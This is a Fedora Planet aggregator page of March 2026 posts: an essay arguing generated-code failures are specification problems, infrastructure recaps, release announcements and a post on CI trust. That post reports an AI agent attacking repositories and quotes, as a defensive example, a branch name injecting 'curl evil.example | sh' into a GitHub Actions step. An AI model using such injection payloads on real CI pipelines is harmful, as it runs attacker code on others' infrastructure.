26 Mar 2026

feedFedora People

Fedora Infrastructure Status: Matrix server maintenance

26 Mar 2026 11:50am GMT

25 Mar 2026


Fedora Infrastructure Status: Updates and reboots on Fedora infrastructure

25 Mar 2026 10:00pm GMT

23 Mar 2026


Brian (bex) Exelbierd: Reflecting on “Warranty Void If Regenerated”


I've seen "Warranty Void if Regenerated" going around, particularly among the subset of my friends who believe "LLMs are slop generators". They typically characterize it as overly optimistic - hopeful, if not downright fantasy.

The "slop generator" position is, in my opinion, demonstrably false: countless successful code generation outcomes contradict such a sweeping generalization. The dogged pursuit of this position clouds the real concerns with LLMs as built and used today. I believe there are legitimate company-ethics, environmental, and license/copyright concerns worthy of consideration in this space. I also believe that we are still in a highly emotional place where those concerns tend to be both understated and overstated depending on who is talking.

The story consists of three vignettes told from the perspective of Tom, a post-transition specification repair person who works with farmers. In this universe, all code is generated from specs and average humans are making custom software constantly. Domain experts are needed to refine, debug, and in some cases wholesale write the specifications.

There is also a great discussion of the human impact of this post-transition existence. I encourage you to read it, but I'm not addressing that below - not because it isn't important, but because I want to preserve focus on the "slop generator" drumbeat that feels so misguided.

All in all, I think the piece is well written and that Scott Werner did a great job. This isn't a critique of the writing or the story itself. I also don't know what Scott's perspective is on LLMs, though their public pages and site lead me to believe they are not anti-generative AI.

I'd been harboring a delusion in the back of my mind about trying to write a story about a "machine whisperer". Scott's piece reminded me that I am likely still not a creative writer, and I'm glad for their work here.

My thesis here is simple: this story reads like a set of specification and contract failures. It does not read like evidence that code generation inherently produces "slop" or that opaque code from code generation is an inherently failed concept. To be clear, this is not a critique of Scott's view, but of the "slop generator" viewpoint.

Margaret

Margaret has generated software that pulls in various data sets from both their farm and external sources to predict the best time to harvest. Their latest crop was harvested before it should have been, and Tom realizes that the specification failed to include a requirement that it raise an error if a data source's structure or methodology changed. Instead, the system absorbed the data from an updated methodology and didn't change how it used that data.

This is shown to be a specification problem. The spec as written didn't suggest that changes were possible or that they should be monitored for, so the generated system didn't do that.

This happens, I suspect, with some regularity in hand-coded systems, but my point isn't that this is normal. When it happens in a hand-coded system, it is wrong too. And, importantly, it is also a specification error.

There may never have been a specification in the first place and the developer was just expected to figure this out. Depending on their experience and other conditions, they either did … or they didn't. A clearer spec or set of standards (a/k/a a system prompt) would have fixed this in both cases.
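The missing requirement is easy to state in code. Here is a minimal sketch of the guard the spec never asked for, with invented field names (the story doesn't describe the feed's actual structure): record the structure the system was generated against, and raise instead of silently absorbing a change.

```python
# Minimal sketch of a "fail loudly on structure change" guard.
# Field names are hypothetical; the story doesn't describe the actual feed.

EXPECTED_FIELDS = {"date", "moisture", "harvest_index"}

def ingest(record: dict) -> dict:
    """Accept a record only if it matches the structure the spec was written for."""
    actual = set(record)
    if actual != EXPECTED_FIELDS:
        raise ValueError(
            f"Feed structure changed: expected {sorted(EXPECTED_FIELDS)}, "
            f"got {sorted(actual)}"
        )
    return record
```

A methodology change that keeps the same field names wouldn't be caught by this alone, which is exactly why the spec would also need versioning or change-flagging from the source. That is the deeper point of the vignette.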

Pit Crew

Scott introduces pit crews in this anecdote. These are people who monitor ongoing quality and concerns.

Today we often approximate this with monitoring systems that we hope are checking the right things, perhaps even with real end-to-end live tests running on a regular basis. We don't generally dedicate human teams to it.

Whether we ever hit post-transition or not, this begs for a conversation: is QE/QA solely a pre-ship function, or should we be leveraging that knowledge to monitor delivered software in ways that go deeper than what we typically monitor today? What does the SRE practice in this space look like?

Framed that way, the pit crew in the story is less a bandage for sloppy generated code and more the missing extension of our specifications and contracts into how we watch systems evolve over time.

Ethan

Ethan has generated a multitude of tools and they are all communicating with each other. Ethan is a microservice machine.

Ethan, much like Margaret, has a data feed problem. This time one of his own tools changed its methodology and calculated a value per hundredweight instead of per head. While not stated in the story, the output unit was presumably chosen at generation time because it wasn't in the specification, and the specification also didn't have a way (or likely even a requirement) to flag changes. The downstream tool didn't get a read failure but began using this new data value as though it were still per head. This resulted in poor market price prediction.

The story is similar to Margaret's except it is more like when Team A breaks Team B in your own company.

For me it raises the interesting point that while we tend to believe otherwise, in many cases our APIs and data formats are our only true contracts. They operate only at the level where they exist. The internals of our dependencies, or the work of other teams, are opaque, and you could say that they may "regenerate" their code every day of the week and you just have to hope it still works for your consumption and use. You have to rely on them not breaking the contract and ensure the contract provides the guarantees you need.
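One way to make that concrete: if the unit had been part of the explicit contract rather than an unstated assumption, the downstream tool would have failed loudly instead of mispredicting. A minimal sketch, with invented names (the story doesn't show any interfaces):

```python
# Hypothetical sketch: carry the unit in the contract so a silent
# methodology change becomes a loud failure. Names are invented.
from dataclasses import dataclass

@dataclass
class PriceReading:
    value: float
    unit: str  # e.g. "per_head" or "per_cwt"

def predict_market_price(reading: PriceReading) -> float:
    """A consumer that only accepts the unit its contract promises."""
    if reading.unit != "per_head":
        raise ValueError(f"Contract violation: expected per_head, got {reading.unit}")
    return reading.value * 1.05  # placeholder prediction logic
```

The prediction itself is a placeholder; the point is only that the unit check turns Ethan's silent drift into an immediate, attributable error at the contract boundary.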

Choreographer

A choreographer is a post-transition architect. It is, in my opinion, the thing we should all be if we are going to use LLMs to generate code.

Here a choreographer goes through Ethan's systems and defines their interface contracts and layers. They also notice that some tools are unnecessary, while others have formed a sub-network that has no effect. The output of this person's work is a cleaned up system that functions as a whole and not a set of discrete parts.

This is something we already have to do in large systems, and it's something that people generating code still have to do. I suspect that some concepts like Gastown try to push parts of this work into a different layer of tooling. And it may even work.

LLM generation and reasoning capabilities keep improving, but none of this eliminates the need for this role or for specification correctness - something we've basically never had. Even waterfall failed here.

In this sense, the story reads less like an indictment of generation and more like a warning about what happens when we refuse to name, own, and maintain those contracts across a growing system.

Carol

Carol's farm illustrates the ugly mess of things we give automation and then complain about.

In this specific case there is a new irrigation system that is using all of the sensors it has to maintain a 60% moisture level across the farm. This results in under- and over-irrigation in some places because the moisture level in those places is influenced by external factors. The system is doing exactly what it was asked to do. The problem is that the target it was given is a bad fit for the actual farm, not that the generated system is inherently bad.

Note: I am not a farmer, so I am taking this example at face value.

The short version is that drainage is funny in some places, other places are getting more wind, and still others need slightly differing levels based on the actual crop in that spot. None of this data has been provided to the system, and the story makes it clear that most of it is not in any system.

The farmer just understands their land and can look at it and tell you what is going to happen based on 30 years of real history and 30 years of experience. This is also not new. This is the art and practice of both coding and system administration, and we have failed to codify it usefully to date. We shouldn't hold our new system accountable for that, but we also shouldn't pretend that "just write a better spec" is an easy button when so much of the domain is still tacitly known and not shared beyond tribal means.

This is perhaps the one vignette that gives me pause. Even if we can find code generation (it doesn't have to be LLMs) that writes to a specification, we may still be unsuccessful when our measurements, abstractions, and language can't yet capture the thing we actually care about.

Right now we make surgical tweaks to the code to encode these lessons as we learn them. Specifying them in human language is often difficult, and maybe that is the core problem. The boundary here isn't really "hand-written vs generated code"; it is between the areas where we, as technologists, have a history of stating things precisely and the areas where we don't.

But we work in a precise space. In the case of Carol's farm, Carol and Tom are able to describe the core problems pretty quickly, and I suspect, given time, could come up with data feeds, additional sensors, or equations that describe the issues sufficiently to fix the irrigation system.

It would be hyper-customized to Carol's farm, but in many ways that is what she wants and needs - and it's something we fail to deliver, in general, today. Even here, though, calling the outcome "slop" feels like a category error: the system is faithfully pursuing the narrow, naive target we gave it, not spewing random garbage.

The Real Conversation

I wrote this piece in part because the anti-LLM rhetoric of "they are slop generators" gets under my skin. There are a lot of valid reasons to be anti-LLM today. This is not one.

Reading the story reinforced that for me: what fails in these vignettes are specs, contracts, and incentives, not some inherent "slop" property of generated code. The story isn't an indictment of generated code, it's a parable about the timeless need for human wisdom, clear communication, and rigorous oversight, no matter how the code comes to be.

I'd like to see our LLM conversations stick closer to the concrete and demonstrably true. Let's focus on what these systems do, where they fail, and how our specs and contracts are part of that story, instead of getting pulled into slogans like "slop generator" that, by being false, derail the conversation. This creates space for us to have the real conversations that matter around ethics, the environment, and training data usage.

23 Mar 2026 10:50am GMT

Alexander Bokovoy: ASN.1 for legacy apps: Synta

23 Mar 2026 8:33am GMT

21 Mar 2026


Matthew Garrett: SSH certificates and git signing

21 Mar 2026 7:38pm GMT

Kevin Fenzi: misc fedora bits third week of march 2026

Scrye into the crystal ball

Things are just flying by and it seems to be saturday again, so here's another weekly recap.

Secureboot signing

Most of my week was consumed with work on our secure boot signing infrastructure. The old setup was using smart cards in specific builders. This had a lot of disadvantages, including:

  • Space on the smart cards was pretty much full, preventing us from adding more certs.

  • Those machines were 'special', and if they went down or broke, things would be bad.

  • The smart cards in them are no longer made or supported, so we couldn't get more for adding more builders.

So, thanks to a bunch of work from Jeremy Cline we finally have things moved over to the new setup. This setup is:

  • Using our normal signing infrastructure (sigul, soon to be replaced by a Rust re-write). We can easily decide in config which machines are used.

  • Using new hardware on the vault end that has more space for more certs.

  • Allowing us to easily add an aarch64 path to sign there.

The signed aarch64 grub2 build is in rawhide now, but for whatever reason it's not working on my slim7x. It is, however, working in VMs, on cloud providers, and on other hardware, so I suspect it might just be a problem with this laptop. It also doesn't work with my Radxa Orion O6, but again, that could be something going on there. I think it's at least good enough to get more widespread testing.

We should hopefully have a signed kernel next week, but in the meantime, if you have an Arm device that supports secureboot, you can update to the latest grub2 and give it a try.

Openh264 builds

We seem to have dropped the ball on f44/f45 openh264 builds. :(

So, I looked at doing some this week. I ran into a linker issue on the i686 builds, but managed to work around it and get the builds done.

Now we just need to wait for Cisco to publish them. I am hoping this process will go much quicker than it has in the past, since we now have a better way to upload things for them.

Time will tell.

Openshift cluster upgrades

I moved all our OpenShift clusters to 4.21.5 this week (from 4.20.15).

I really love how easy OpenShift upgrades are: press a button and wait, usually. I did have to upgrade to the latest 4.20 first before it would let me move to 4.21, but both steps went fine.

Mass update / reboots next week

Next week we will be catching up on updates all around and rebooting things. The week after, we start the Fedora 44 Final freeze, so we want to have things all updated before that. No special stuff this time, just updates/reboots, so I expect it to go smoothly.

comments? additions? reactions?

As always, comment on mastodon: https://fosstodon.org/@nirik/116268414239551452

21 Mar 2026 5:25pm GMT

Fedora Magazine: Contribute at the Fedora CoreOS 44 Test Week


The Fedora CoreOS and QA teams are gearing up for Fedora 44, and we need your help! We are organizing a Test Week running from March 23 to March 27, 2026.

This event is a nice opportunity for the community to test Fedora CoreOS (FCOS) based on Fedora 44 content before it officially reaches the testing and stable streams. By participating, you help us ensure a smooth and reliable experience for all users.

How does a Test Week work?

A Test Week is an event where anyone can help verify that the upcoming release works as expected. If you've been looking for a way to get started with Fedora contribution, this is the perfect entry point.

To participate, start with the Wiki Page - it is your primary source of information for this event. Once you have completed your tests, please log your results there! Your contribution, big or small, makes a huge difference. Let's work together to make this release a great one. Happy testing!

Join the Live Sync Session

Want to chat with the team? We are hosting a live video session on Tuesday, March 24, from 3:00 PM to 4:30 PM UTC. Drop in to ask questions and get help with testing!

Video Meeting: meet.google.com/ufp-bwsb-zwh

21 Mar 2026 8:00am GMT

20 Mar 2026


Fedora Community Blog: Community Update – Week 12 2026


This is a report created by the CLE Team, which is a team of community members working in various Fedora groups, for example Infrastructure, Release Engineering, and Quality. This team also moves some initiatives forward inside the Fedora project.

Week: 16 - 20 March 2026

Fedora Infrastructure

This team is taking care of day-to-day business regarding Fedora Infrastructure.
It's responsible for services running in Fedora infrastructure.
Ticket tracker

CentOS Infra including CentOS CI

This team is taking care of day-to-day business regarding CentOS Infrastructure and CentOS Stream Infrastructure.
It's responsible for services running in CentOS Infrastructure and CentOS Stream.
CentOS ticket tracker
CentOS Stream ticket tracker

Release Engineering

This team is taking care of day-to-day business regarding Fedora releases.
It's responsible for releases, the retirement process of packages, and package builds.
Ticket tracker

RISC-V

This is the summary of the work done regarding the RISC-V architecture in Fedora.

AI

This is the summary of the work done regarding AI in Fedora.

QE

This team is taking care of the quality of Fedora: maintaining CI, organizing test days,
and keeping an eye on the overall quality of Fedora releases.

Forgejo

This team is working on the introduction of https://forge.fedoraproject.org to Fedora
and the migration of repositories from pagure.io.

EPEL

This team is working on keeping EPEL running and helping package things.

UX

This team is working on improving user experience: providing artwork, usability,
and general design services to the Fedora Project.

If you have any questions or feedback, please respond to this report or contact us in the #admin:fedoraproject.org channel on Matrix.

The post Community Update - Week 12 2026 appeared first on Fedora Community Blog.

20 Mar 2026 12:00pm GMT

Fedora Badges: New badge: Chemnitzer Linux-Tage 2026 !

20 Mar 2026 4:21am GMT

19 Mar 2026


Christof Damian: Friday Links 26-10

19 Mar 2026 11:00pm GMT

Peter Czanik: My new toy: FreeBSD on the HP Z2 mini revisited

19 Mar 2026 9:43am GMT

18 Mar 2026


Peter Czanik: Central log collection - more than just compliance

18 Mar 2026 3:10pm GMT

Fedora Magazine: Fedora Asahi Remix 43 is now available


We are happy to announce the general availability of Fedora Asahi Remix 43. This release brings Fedora Linux 43 to Apple Silicon Macs.

Fedora Asahi Remix is developed in close collaboration with the Fedora Asahi SIG and the Asahi Linux project. This release incorporates all the exciting improvements brought by Fedora Linux 43. Notably, package management is significantly upgraded with RPM 6.0 and the new DNF5 backend for PackageKit (used by Plasma Discover and GNOME Software) ahead of Fedora Linux 44. It also continues to provide extensive device support. This includes newly added support for the Mac Pro, microphones in M2 Pro/Max MacBooks, and 120Hz refresh rate for the built-in displays of MacBook Pro 14/16 models.

Fedora Asahi Remix offers KDE Plasma 6.6 as our flagship desktop experience. It contains all of the new and exciting features brought by Fedora KDE Plasma Desktop 43. It also features a custom Calamares-based initial setup wizard. A GNOME variant is also available, featuring GNOME 49, with both desktop variants matching what Fedora Linux offers. Fedora Asahi Remix also provides a Fedora Server variant for server workloads and other types of headless deployments. Finally, we offer a Minimal image for users that wish to build their own experience from the ground up.

You can install Fedora Asahi Remix today by following our installation guide. Existing systems running Fedora Asahi Remix 41 or 42 should be updated following the usual Fedora upgrade process. Upgrades via GNOME's Software application are unfortunately not supported. Either KDE's Plasma Discover or DNF's System Upgrade command must be used.

Please report any Remix-specific issues in our tracker, or reach out in our Discourse forum or our Matrix room for user support.

18 Mar 2026 2:00pm GMT

Ben Cotton: A trust paradox


Last month, I wrote about how to define, build, and measure trust in your community. Here's the challenge: you need to extend trust in order for someone to build trust. I touched on this in 2023 after an Ubuntu release included hate speech in translations. It came back to the fore earlier this month after an AI agent attacked a handful of high-profile GitHub repositories.

The agent took advantage of workflows that allowed an attacker to run malicious code via a variety of mechanisms, including the branch name. The attacking agent only needed to open a pull request to cause damage. Normally, tests run by CI infrastructure are a way to evaluate the trustworthiness of a pull request. Most pull requests, of course, are not malicious, but that doesn't make them trustworthy. A change that fails linting, unit tests, or integration tests may not be worth a maintainer's time to review.

So if automated CI tests are both a way to measure trust and a vector for attack, what's the responsible maintainer to do?

The first step is to make sure your CI jobs are securely configured. Tools like zizmor can identify insecure configurations. You may also want to require that a maintainer manually approve workflows before running against pull requests from untrusted sources. This, of course, puts you into a position where you now have to at least give a cursory review to make sure the change is safe enough for your CI workflow. But that's less work than a detailed review.
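As an illustration of the branch-name vector, here is a hypothetical GitHub Actions fragment (not taken from the attacked repositories): the runner expands `${{ }}` expressions into the script text before the shell sees it, so interpolating an attacker-controlled value like the branch name directly into a `run:` step lets a crafted branch name execute arbitrary commands. Passing the value through an environment variable keeps it as data rather than code.

```yaml
# Hypothetical workflow fragment, for illustration only.
#
# Vulnerable: the expression is expanded into the script itself, so a
# branch named  x"; curl evil.example | sh; "  runs attacker code:
#
#   - run: echo "Testing branch: ${{ github.head_ref }}"
#
# Safer: pass the untrusted value via an environment variable:
- name: Report branch under test
  run: echo "Testing branch: $BRANCH"
  env:
    BRANCH: ${{ github.head_ref }}
```

Auditors like zizmor flag exactly this kind of template-injection pattern, which is part of why running such a tool over your workflows is a cheap first step.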

With the rise in AI-generated pull requests, this is a problem that will only add more toil for maintainers. Hopefully, platforms will provide tools that reduce the burden.

This post's featured photo by 愚木混株 Yumu on Unsplash.

The post A trust paradox appeared first on Duck Alignment Academy.

18 Mar 2026 12:00pm GMT

Remi Collet: 📝 Valkey version 9.1 🎲


RPMs of Valkey version 9.1 are available in the remi-modular repository for Fedora ≥ 42 and Enterprise Linux ≥ 8 (RHEL, Alma, CentOS, Rocky...).

⚠️ Warning: this is a pre-release version not ready for production usage.

1. Installation

Packages are available in the valkey:remi-9.1 module stream.

1.1. Using dnf4 on Enterprise Linux

# dnf install https://rpms.remirepo.net/enterprise/remi-release-<ver>.rpm
# dnf module switch-to valkey:remi-9.1/common

1.2. Using dnf5 on Fedora

# dnf install https://rpms.remirepo.net/fedora/remi-release-<ver>.rpm
# dnf module reset  valkey
# dnf module enable valkey:remi-9.1
# dnf install valkey

The valkey-compat-redis compatibility package is not available in this stream. If you need the Redis commands, you can install the redis package.

2. Modules

Some optional modules are also available:

These packages are weak dependencies of Valkey, so they are installed by default (if install_weak_deps is not disabled in the dnf configuration).

The modules are automatically loaded after installation and service (re)start.

3. Future

Valkey also provides a set of modules, which may be submitted to the official Fedora repository.

ℹ️ Notices:

4. Statistics


18 Mar 2026 9:29am GMT

17 Mar 2026


Peter Czanik: My new toy: AI first steps with the HP Z2 Mini

17 Mar 2026 1:40pm GMT